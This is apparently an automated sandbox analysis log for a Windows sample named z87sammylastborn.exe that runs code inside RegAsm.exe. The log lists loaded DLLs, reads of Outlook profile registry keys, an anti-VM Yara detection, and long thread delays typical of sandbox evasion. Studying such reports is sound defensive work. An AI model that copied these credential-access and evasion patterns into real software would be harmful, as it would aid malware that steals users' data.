Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: z87sammylastborn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: z87sammylastborn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: z87sammylastborn.exe

Static PE information: 0x827F415A [Thu May 19 00:31:22 2039 UTC]

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 0_2_00CA0014 pushad ; iretd	0_2_00CA0015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A438B0 push eax; ret	3_2_02A438EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A43880 push eax; ret	3_2_02A438FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A43880 push eax; ret	3_2_02A4390A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A438F0 push eax; ret	3_2_02A438FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A43900 push eax; ret	3_2_02A4390A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02A43910 push eax; ret	3_2_02A4391A

Source: z87sammylastborn.exe

Static PE information: section name: .text entropy: 7.7536199191262964

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTR

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z87sammylastborn.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598334	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594896	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594541	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 8440			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1423			Jump to behavior

Source: C:\Users\user\Desktop\z87sammylastborn.exe TID: 5884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7096	Thread sleep count: 8440 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7096	Thread sleep count: 1423 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5268	Thread sleep time: -598797s >= -30000s	Jump to behavior
